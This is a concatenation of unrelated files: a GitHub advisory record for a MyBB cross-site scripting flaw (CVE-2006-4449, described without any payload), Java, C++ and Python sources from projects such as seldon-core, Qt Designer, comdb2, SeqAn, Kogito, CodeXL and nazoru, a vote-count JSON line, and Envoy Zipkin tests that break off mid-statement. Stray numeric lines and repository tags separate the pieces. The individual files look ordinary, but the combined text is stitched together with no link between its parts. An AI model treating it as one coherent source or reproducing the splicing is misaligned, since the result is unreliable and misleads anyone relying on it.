{ "schema_version": "1.2.0", "id": "GHSA-w5xq-qgqm-hj39", "modified": "2022-05-01T07:18:47Z", "published": "2022-05-01T07:18:47Z", "aliases": [ "CVE-2006-4449" ], "details": "Cross-site scripting (XSS) vulnerability in attachment.php in MyBulletinBoard (MyBB) 1.1.7 and possibly other versions allows remote attackers to inject arbitrary web script or HTML via a GIF image that contains URL-encoded Javascript, which is rendered by Internet Explorer.", "severity": [ ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-4449" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28587" }, { "type": "WEB", "url": "http://secunia.com/advisories/21645" }, { "type": "WEB", "url": "http://securityreason.com/securityalert/1469" }, { "type": "WEB", "url": "http://www.mybboard.com/archive.php?nid=18" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/444414/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/19718" } ], "database_specific": { "cwe_ids": [ ], "severity": "MODERATE", "github_reviewed": false } }
609
3,049
<reponame>juldou/seldon-core<gh_stars>1000+ package io.seldon.engine.util; import java.io.IOException; import java.nio.charset.Charset; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64; public class TestUtils { public static byte[] readFileBytes(String path) throws IOException { return Files.readAllBytes(Paths.get(path)); } public static String readFile(String path, Charset encoding) throws IOException { return new String(readFileBytes(path), encoding); } public static String readFileBase64(String path) throws IOException { return Base64.getEncoder().encodeToString(readFileBytes(path)); } }
219
3,095
<filename>designer/lib/shared/qdesigner_propertyeditor.cpp /**************************************************************************** ** ** Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies). ** All rights reserved. ** Contact: Nokia Corporation (<EMAIL>) ** ** This file is part of the Qt Designer of the Qt Toolkit. ** ** $QT_BEGIN_LICENSE:LGPL$ ** Commercial Usage ** Licensees holding valid Qt Commercial licenses may use this file in ** accordance with the Qt Commercial License Agreement provided with the ** Software or, alternatively, in accordance with the terms contained in ** a written agreement between you and Nokia. ** ** GNU Lesser General Public License Usage ** Alternatively, this file may be used under the terms of the GNU Lesser ** General Public License version 2.1 as published by the Free Software ** Foundation and appearing in the file LICENSE.LGPL included in the ** packaging of this file. Please review the following information to ** ensure the GNU Lesser General Public License version 2.1 requirements ** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html. ** ** In addition, as a special exception, Nokia gives you certain additional ** rights. These rights are described in the Nokia Qt LGPL Exception ** version 1.1, included in the file LGPL_EXCEPTION.txt in this package. ** ** GNU General Public License Usage ** Alternatively, this file may be used under the terms of the GNU ** General Public License version 3.0 as published by the Free Software ** Foundation and appearing in the file LICENSE.GPL included in the ** packaging of this file. Please review the following information to ** ensure the GNU General Public License version 3.0 requirements will be ** met: http://www.gnu.org/copyleft/gpl.html. ** ** If you have questions regarding the use of this file, please contact ** Nokia at <EMAIL>. ** $QT_END_LICENSE$ ** ****************************************************************************/ #include "qdesigner_propertyeditor_p.h" #include "pluginmanager_p.h" #include <QtDesigner/QDesignerFormEditorInterface> #include <widgetfactory_p.h> #include <QtGui/QAction> #include <QtGui/QLineEdit> #include <QtGui/QAbstractButton> QT_BEGIN_NAMESPACE namespace qdesigner_internal { typedef QDesignerPropertyEditor::StringPropertyParameters StringPropertyParameters; // A map of property name to type typedef QHash<QString, StringPropertyParameters> PropertyNameTypeMap; // Compile a map of hard-coded string property types static const PropertyNameTypeMap &stringPropertyTypes() { static PropertyNameTypeMap propertyNameTypeMap; if (propertyNameTypeMap.empty()) { const StringPropertyParameters richtext(ValidationRichText, true); // Accessibility. Both are texts the narrator reads propertyNameTypeMap.insert(QLatin1String("accessibleDescription"), richtext); propertyNameTypeMap.insert(QLatin1String("accessibleName"), richtext); // object names const StringPropertyParameters objectName(ValidationObjectName, false); propertyNameTypeMap.insert(QLatin1String("buddy"), objectName); propertyNameTypeMap.insert(QLatin1String("currentItemName"), objectName); propertyNameTypeMap.insert(QLatin1String("currentPageName"), objectName); propertyNameTypeMap.insert(QLatin1String("currentTabName"), objectName); propertyNameTypeMap.insert(QLatin1String("layoutName"), objectName); propertyNameTypeMap.insert(QLatin1String("spacerName"), objectName); // Style sheet propertyNameTypeMap.insert(QLatin1String("styleSheet"), StringPropertyParameters(ValidationStyleSheet, false)); // Buttons/ QCommandLinkButton const StringPropertyParameters multiline(ValidationMultiLine, true); propertyNameTypeMap.insert(QLatin1String("description"), multiline); propertyNameTypeMap.insert(QLatin1String("iconText"), multiline); // Tooltips, etc. propertyNameTypeMap.insert(QLatin1String("toolTip"), richtext); propertyNameTypeMap.insert(QLatin1String("whatsThis"), richtext); propertyNameTypeMap.insert(QLatin1String("windowIconText"), richtext); propertyNameTypeMap.insert(QLatin1String("html"), richtext); // A QWizard page id propertyNameTypeMap.insert(QLatin1String("pageId"), StringPropertyParameters(ValidationSingleLine, false)); // QPlainTextEdit propertyNameTypeMap.insert(QLatin1String("plainText"), StringPropertyParameters(ValidationMultiLine, true)); } return propertyNameTypeMap; } QDesignerPropertyEditor::QDesignerPropertyEditor(QWidget *parent, Qt::WindowFlags flags) : QDesignerPropertyEditorInterface(parent, flags), m_propertyChangedForwardingBlocked(false) { // Make old signal work for compatibility connect(this, SIGNAL(propertyChanged(QString,QVariant)), this, SLOT(slotPropertyChanged(QString,QVariant))); } QDesignerPropertyEditor::StringPropertyParameters QDesignerPropertyEditor::textPropertyValidationMode( QDesignerFormEditorInterface *core, const QObject *object, const QString &propertyName, bool isMainContainer) { // object name - no comment if (propertyName == QLatin1String("objectName")) { const TextPropertyValidationMode vm = isMainContainer ? ValidationObjectNameScope : ValidationObjectName; return StringPropertyParameters(vm, false); } // Check custom widgets by class. const QString className = WidgetFactory::classNameOf(core, object); const QDesignerCustomWidgetData customData = core->pluginManager()->customWidgetData(className); if (!customData.isNull()) { StringPropertyParameters customType; if (customData.xmlStringPropertyType(propertyName, &customType)) return customType; } // Check hardcoded property ames const PropertyNameTypeMap::const_iterator hit = stringPropertyTypes().constFind(propertyName); if (hit != stringPropertyTypes().constEnd()) return hit.value(); // text: Check according to widget type. if (propertyName == QLatin1String("text")) { if (qobject_cast<const QAction *>(object) || qobject_cast<const QLineEdit *>(object)) return StringPropertyParameters(ValidationSingleLine, true); if (qobject_cast<const QAbstractButton *>(object)) return StringPropertyParameters(ValidationMultiLine, true); return StringPropertyParameters(ValidationRichText, true); } // Fuzzy matching if (propertyName.endsWith(QLatin1String("Name"))) return StringPropertyParameters(ValidationSingleLine, true); if (propertyName.endsWith(QLatin1String("ToolTip"))) return StringPropertyParameters(ValidationRichText, true); #ifdef Q_OS_WIN // No translation for the active X "control" property if (propertyName == QLatin1String("control") && className == QLatin1String("QAxWidget")) return StringPropertyParameters(ValidationSingleLine, false); #endif // default to single return StringPropertyParameters(ValidationSingleLine, true); } void QDesignerPropertyEditor::emitPropertyValueChanged(const QString &name, const QVariant &value, bool enableSubPropertyHandling) { // Avoid duplicate signal emission - see below m_propertyChangedForwardingBlocked = true; emit propertyValueChanged(name, value, enableSubPropertyHandling); emit propertyChanged(name, value); m_propertyChangedForwardingBlocked = false; } void QDesignerPropertyEditor::slotPropertyChanged(const QString &name, const QVariant &value) { // Forward signal from Integration using the old interfaces. if (!m_propertyChangedForwardingBlocked) emit propertyValueChanged(name, value, true); } } QT_END_NAMESPACE
2,358
1,133
<reponame>mikesep/comdb2 /* Copyright 2015 Bloomberg Finance L.P. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package com.bloomberg.comdb2.jdbc; import java.io.Serializable; import java.util.Arrays; import java.util.List; /** * Cdb2DbInfoResponse * * @author <NAME> * @author <NAME> */ public class Cdb2DbInfoResponse implements Serializable{ private static final long serialVersionUID = -3986582382656884287L; static class NodeInfo { String name; int number; int incoherent; int room; int port; NodeInfo(String name, int number, int incoherent, int room, int port) { super(); this.name = name; this.number = number; this.incoherent = incoherent; this.room = room; this.port = port; } @Override public String toString() { return String.format("name = %s, number = %d, incoherent = %d, room = %d, port = %d", name, number, incoherent, room, port); } } NodeInfo master; List<NodeInfo> nodes; Constants.PEER_SSL_MODE peermode; @Override public String toString() { return master.toString() + "\n" + Arrays.toString(nodes.toArray(new NodeInfo[]{})); } } /* vim: set sw=4 ts=4 et: */
694
409
//![initialization] #include <iostream> #include <seqan/index.h> using namespace seqan; int main() { StringSet<CharString> myStringSet; appendValue(myStringSet, "tobeornottobe"); appendValue(myStringSet, "thebeeonthecomb"); appendValue(myStringSet, "beingjohnmalkovich"); typedef Index<StringSet<CharString> > TMyIndex; TMyIndex myIndex(myStringSet); //![initialization] //![iteration1] Iterator<TMyIndex, TopDown<ParentLinks<Postorder> > >::Type myIterator(myIndex); // Top-down iterators start in the root node which is not the first node of a // postorder DFS. Thus we have to manually go to the DFS start with goBegin goBegin(myIterator); while (!atEnd(myIterator)) { std::cout << representative(myIterator) << std::endl; ++myIterator; } //![iteration1] //![iteration2] Iterator<TMyIndex, BottomUp<> >::Type myIterator2(myIndex); while (!atEnd(myIterator2)) { std::cout << representative(myIterator2) << std::endl; ++myIterator2; } return 0; } //![iteration2]
422
818
<filename>kogito-codegen-modules/kogito-codegen-openapi/src/test/java/org/kie/kogito/codegen/openapi/client/OpenApiClientCodegenTest.java /* * Copyright 2021 Red Hat, Inc. and/or its affiliates. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.kie.kogito.codegen.openapi.client; import java.nio.file.Paths; import java.util.Collection; import java.util.Collections; import java.util.HashMap; import java.util.Map; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.MethodSource; import org.kie.kogito.codegen.api.GeneratedFile; import org.kie.kogito.codegen.api.context.KogitoBuildContext; import static org.assertj.core.api.Assertions.assertThat; import static org.kie.kogito.codegen.api.utils.CollectedResourcesTestUtils.toCollectedResources; class OpenApiClientCodegenTest { @ParameterizedTest @MethodSource("org.kie.kogito.codegen.api.utils.KogitoContextTestUtils#contextBuilders") public void isEmpty(KogitoBuildContext.Builder contextBuilder) { final String workflowDefinitionFile = "/sendcloudeventonprovision.sw.json"; KogitoBuildContext context = contextBuilder.build(); OpenApiClientCodegen emptyCodeGenerator = OpenApiClientCodegen.ofCollectedResources(context, Collections.emptyList()); assertThat(emptyCodeGenerator.isEmpty()).isTrue(); assertThat(emptyCodeGenerator.isEnabled()).isFalse(); Collection<GeneratedFile> emptyGeneratedFiles = emptyCodeGenerator.generate(); assertThat(emptyGeneratedFiles.size()).isEqualTo(0); final OpenApiClientCodegen codeGenerator = OpenApiClientCodegen.ofCollectedResources(context, toCollectedResources(workflowDefinitionFile)); assertThat(codeGenerator.isEmpty()).isFalse(); assertThat(codeGenerator.isEnabled()).isTrue(); assertThat(codeGenerator.getOpenAPISpecResources()).hasSizeGreaterThanOrEqualTo(1); } @ParameterizedTest @MethodSource("org.kie.kogito.codegen.api.utils.KogitoContextTestUtils#contextBuilders") void verifyHTTPResource(final KogitoBuildContext.Builder contextBuilder) { final String workflowDefinitionFile = "/sendcloudeventonprovision.sw.json"; final KogitoBuildContext context = contextBuilder.build(); final OpenApiClientCodegen codegen = OpenApiClientCodegen.ofCollectedResources(context, toCollectedResources(workflowDefinitionFile)); assertThat(codegen).isNotNull(); assertThat(codegen.getOpenAPISpecResources()).isNotEmpty(); assertThat(codegen.getOpenAPISpecResources()).hasSize(1); assertThat(codegen.getOpenAPISpecResources().get(0).getResourceName()).isEqualTo("provisioning.json"); assertThat(codegen.getOpenAPISpecResources().get(0).getId()).contains("provisioning"); assertThat(codegen.getOpenAPISpecResources().get(0).getURI().getScheme()).isEqualTo("http"); } @ParameterizedTest @MethodSource("org.kie.kogito.codegen.api.utils.KogitoContextTestUtils#contextBuilders") void verifyLocalMultipleResources(final KogitoBuildContext.Builder contextBuilder) { final String workflowDefinitionFile = "/sendcloudeventonprovision2.sw.json"; final KogitoBuildContext context = contextBuilder.build(); final OpenApiClientCodegen codegen = OpenApiClientCodegen.ofCollectedResources(context, toCollectedResources(workflowDefinitionFile)); assertThat(codegen).isNotNull(); assertThat(codegen.getOpenAPISpecResources()).isNotEmpty(); assertThat(codegen.getOpenAPISpecResources()).hasSize(1); assertThat(codegen.getOpenAPISpecResources().get(0).getResourceName()).isEqualTo("provisioning.json"); assertThat(codegen.getOpenAPISpecResources().get(0).getId()).contains("provisioning"); assertThat(codegen.getOpenAPISpecResources().get(0).getURI().getScheme()).isNull(); } @ParameterizedTest @MethodSource("org.kie.kogito.codegen.api.utils.KogitoContextTestUtils#contextBuilders") void verifyCodegenClasspath(final KogitoBuildContext.Builder contextBuilder) { final String workflowDefinitionFile = "/petstore-classpath.sw.json"; final KogitoBuildContext context = contextBuilder.build(); final OpenApiClientCodegen codegen = OpenApiClientCodegen.ofCollectedResources(context, toCollectedResources(workflowDefinitionFile)); assertCodeGen(codegen.generate()); assertThat(codegen.getOpenAPISpecResources()).hasSize(1); assertThat(codegen.getOpenAPISpecResources().get(0).getRequiredOperations()).hasSize(2); assertThat(codegen.getOpenAPISpecResources().get(0).getRequiredOperations() .stream() .anyMatch(o -> o.getOperationId().equals("getInventory") && o.getParameters().size() == 0 && o.getGeneratedClass().endsWith("StoreApi"))).isTrue(); assertThat(codegen.getOpenAPISpecResources().get(0).getRequiredOperations() .stream() .anyMatch(o -> o.getOperationId().equals("uploadFile") && o.getParameters().size() == 3 && o.getGeneratedClass().endsWith("PetApi"))).isTrue(); } private void assertCodeGen(final Collection<GeneratedFile> generatedFiles) { assertThat(generatedFiles).isNotEmpty(); final Map<String, Boolean> requiredFiles = new HashMap<>(); requiredFiles.put("ApiClient.java", false); requiredFiles.put("KogitoApiClient.java", false); requiredFiles.put("PetApi.java", false); final Map<String, Boolean> absentFiles = new HashMap<>(); absentFiles.put("Pet.api", false); for (GeneratedFile file : generatedFiles) { assertThat(file.relativePath()).endsWith(".java"); final String fileName = Paths.get(file.relativePath()).getFileName().toString(); requiredFiles.computeIfPresent(fileName, (k, v) -> true); absentFiles.computeIfPresent(fileName, (k, v) -> true); } assertThat(requiredFiles).allSatisfy((file, present) -> { assertThat(present).isTrue(); }); assertThat(absentFiles).allSatisfy((file, present) -> { assertThat(present).isFalse(); }); } }
2,647
1,025
<filename>CodeXL/Components/GpuDebugging/AMDTOpenCLServer/src/csOpenCLHandleMonitor.cpp //================================================================================== // Copyright (c) 2016 , Advanced Micro Devices, Inc. All rights reserved. // /// \author AMD Developer Tools Team /// \file csOpenCLHandleMonitor.cpp /// //================================================================================== //------------------------------ csOpenCLHandleMonitor.cpp ------------------------------ // Infra: #include <AMDTBaseTools/Include/gtAssert.h> #include <AMDTOSWrappers/Include/osDebugLog.h> #include <AMDTOSWrappers/Include/osCriticalSectionLocker.h> // Local: #include <src/csOpenCLHandleMonitor.h> // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::csOpenCLHandleMonitor // Description: Constructor. // Arguments: // Author: <NAME> // Date: 8/12/2009 // --------------------------------------------------------------------------- csOpenCLHandleMonitor::csOpenCLHandleMonitor() { } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::~csOpenCLHandleMonitor // Description: Destructor. // Author: <NAME> // Date: 8/12/2009 // --------------------------------------------------------------------------- csOpenCLHandleMonitor::~csOpenCLHandleMonitor() { osCriticalSectionLocker mapCSLocker(m_clHandleObjectsMapAccessCS); // Clear the object IDs: gtMap<oaCLHandle, apCLObjectID*>::iterator iter = _clHandleObjectsMap.begin(); gtMap<oaCLHandle, apCLObjectID*>::iterator endIter = _clHandleObjectsMap.end(); for (; endIter != iter; iter++) { delete(*iter).second; } // Clear the map: _clHandleObjectsMap.clear(); } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::getCLHandleObjectDetails // Description: Return an OpenCL object by its handle // Arguments: void* ptr // Return Val: apCLObjectID* // Author: <NAME> // Date: 8/12/2009 // --------------------------------------------------------------------------- apCLObjectID* csOpenCLHandleMonitor::getCLHandleObjectDetails(oaCLHandle ptr) const { apCLObjectID* pRetVal = NULL; // Do not attempt this if the critical section is locked: if (((osCriticalSection&)m_clHandleObjectsMapAccessCS).tryEntering()) { // Find the handle within the map: gtMap<oaCLHandle, apCLObjectID*>::const_iterator iterFind = _clHandleObjectsMap.find(ptr); if (iterFind != _clHandleObjectsMap.end()) { pRetVal = (*iterFind).second; } ((osCriticalSection&)m_clHandleObjectsMapAccessCS).leave(); } return pRetVal; } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::registerOpenCLHandle // Description: Adds an openCL handle mapping // Arguments: void* ptr // int contextId // int objectId // osTransferableObjectType objectType // int ownerObjectId - represent the object that owns the object - // for example - program for kernels. This parameter is optional // int objectDisplayId - when the object name is different then it's index (object that // are released), use this parameter for the object 'real' display name // Return Val: void // Author: <NAME> // Date: 8/12/2009 // --------------------------------------------------------------------------- void csOpenCLHandleMonitor::registerOpenCLHandle(oaCLHandle ptr, int contextId, int objectId, osTransferableObjectType objectType, int ownerObjectId, int objectDisplayId) { osCriticalSectionLocker mapCSLocker(m_clHandleObjectsMapAccessCS); apCLObjectID* pNewObj = getCLHandleObjectDetails(ptr); if (pNewObj == NULL) { pNewObj = new apCLObjectID; // Insert the new object to the map: _clHandleObjectsMap[ptr] = pNewObj; } // Set the object details: pNewObj->_contextId = contextId; pNewObj->_objectId = objectId; pNewObj->_objectType = objectType; pNewObj->_ownerObjectId = ownerObjectId; pNewObj->_objectDisplayName = objectDisplayId; } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::nameHandledObject // Description: Sets the name of a handled object, to match a call to a // clNameXxxxGREMEDY() function. // Author: <NAME> // Date: 22/7/2010 // --------------------------------------------------------------------------- void csOpenCLHandleMonitor::nameHandledObject(oaCLHandle handle, const gtString& objectName) { osCriticalSectionLocker mapCSLocker(m_clHandleObjectsMapAccessCS); gtMap<oaCLHandle, apCLObjectID*>::iterator findIter = _clHandleObjectsMap.find(handle); if (findIter != _clHandleObjectsMap.end()) { apCLObjectID* pObjectId = (*findIter).second; GT_IF_WITH_ASSERT(pObjectId != NULL) { pObjectId->_objectName = objectName; } } } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::validateLivingHandle // Description: Returns true iff the handle is registered as a living object of the given type. // Author: <NAME> // Date: 28/7/2015 // --------------------------------------------------------------------------- bool csOpenCLHandleMonitor::validateLivingHandle(oaCLHandle handle, osTransferableObjectType type) const { bool retVal = false; if (OA_CL_NULL_HANDLE != handle) { // HERE BE DRAGONS! // Do not attempt to update an object we "know" is dead (that is to say, its handle has been released, but it is not yet reused). apCLObjectID* pObj = getCLHandleObjectDetails(handle); retVal = (nullptr != pObj); if (retVal) { retVal = (-1 < pObj->_objectId); // Devices are not context-bound: if (OS_TOBJ_ID_CL_DEVICE != type) { retVal = retVal && (0 < pObj->_contextId); } else // OS_TOBJ_ID_CL_DEVICE == type { retVal = retVal && (0 == pObj->_contextId); } retVal = retVal && (type == pObj->_objectType); } } return retVal; }
2,227
1,002
<reponame>ikeji/mozc-devices #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import codecs import os from setuptools import setup, find_packages def read_file(name): with codecs.open( os.path.join(os.path.dirname(__file__), name), 'r', 'utf-8') as f: return f.read().strip() setup( name='nazoru-input', version='0.1.2', author='<NAME>', author_email='<EMAIL>', url='https://landing.google.com/tegaki', description='Package for Gboard Physical Handwriting Version', long_description=read_file('README.rst'), license='Apache', classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Console', 'Environment :: No Input/Output (Daemon)', 'Operating System :: OS Independent', 'Programming Language :: Python', 'License :: OSI Approved :: Apache Software License', 'Topic :: Scientific/Engineering :: Artificial Intelligence', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities', ], packages=find_packages('src'), package_dir={'': 'src'}, package_data={ 'nazoru': ['data/optimized_nazoru.pb'] }, scripts=[ 'bin/nazoru-input', 'bin/nazoru-training' ], # For installing the nazoru_input as a service of systemd. Please uncomment # the following |data_files| if you want to install nazoru.service. # data_files=[('/etc/systemd/system', ['data/nazoru.service'])], install_requires=[ 'cairocffi', 'pillow', 'tensorflow~=2.5.1', 'tf_slim~=1.1.0', 'enum34;python_version<"3.4"', 'pyserial', 'evdev;platform_system=="Linux"', 'wiringpi;platform_system=="Linux"' ] )
889
348
<filename>docs/data/t2/031/31123.json {"nom":"Castillon-de-Larboust","dpt":"Haute-Garonne","inscrits":65,"abs":11,"votants":54,"blancs":9,"nuls":2,"exp":43,"res":[{"panneau":"1","voix":31},{"panneau":"2","voix":12}]}
93
17,703
<gh_stars>1000+ #include "source/common/tracing/http_tracer_impl.h" #include "source/extensions/tracers/zipkin/span_context.h" #include "source/extensions/tracers/zipkin/span_context_extractor.h" #include "test/test_common/utility.h" #include "gtest/gtest.h" namespace Envoy { namespace Extensions { namespace Tracers { namespace Zipkin { namespace { const std::string trace_id{"0000000000000001"}; const std::string trace_id_high{"0000000000000009"}; const std::string span_id{"0000000000000003"}; const std::string parent_id{"0000000000000002"}; } // namespace TEST(ZipkinSpanContextExtractorTest, Largest) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{}-1-{}", trace_id_high, trace_id, span_id, parent_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(2, context.first.parentId()); EXPECT_TRUE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(9, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, WithoutParentDebug) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{}-d", trace_id_high, trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_TRUE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(9, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, MalformedUuid) { Http::TestRequestHeaderMapImpl request_headers{{"b3", "b970dafd-0d95-40aa-95d8-1d8725aebe40"}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: invalid trace id b970dafd-0d95-40"); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, MiddleOfString) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{},", trace_id, trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, DebugOnly) { Http::TestRequestHeaderMapImpl request_headers{{"b3", "d"}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_FALSE(context.second); EXPECT_EQ(0, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(0, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_FALSE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, Sampled) { Http::TestRequestHeaderMapImpl request_headers{{"b3", "1"}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_FALSE(context.second); EXPECT_EQ(0, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(0, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_FALSE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, SampledFalse) { Http::TestRequestHeaderMapImpl request_headers{{"b3", "0"}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_FALSE(context.second); EXPECT_EQ(0, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(0, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_FALSE(context.first.sampled()); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, IdNotYetSampled128) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{}", trace_id_high, trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_TRUE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(9, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, IdsUnsampled) { Http::TestRequestHeaderMapImpl request_headers{{"b3", fmt::format("{}-{}-0", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, ParentUnsampled) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-0-{}", trace_id, span_id, parent_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(2, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, ParentDebug) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-d-{}", trace_id, span_id, parent_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(2, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, IdsWithDebug) { Http::TestRequestHeaderMapImpl request_headers{{"b3", fmt::format("{}-{}-d", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, WithoutSampled) { Http::TestRequestHeaderMapImpl request_headers{{"b3", fmt::format("{}-{}", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(false); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_FALSE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(0, context.first.traceIdHigh()); EXPECT_FALSE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, TooBig) { { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}{}-{}-{}", trace_id, trace_id, trace_id, span_id, trace_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), 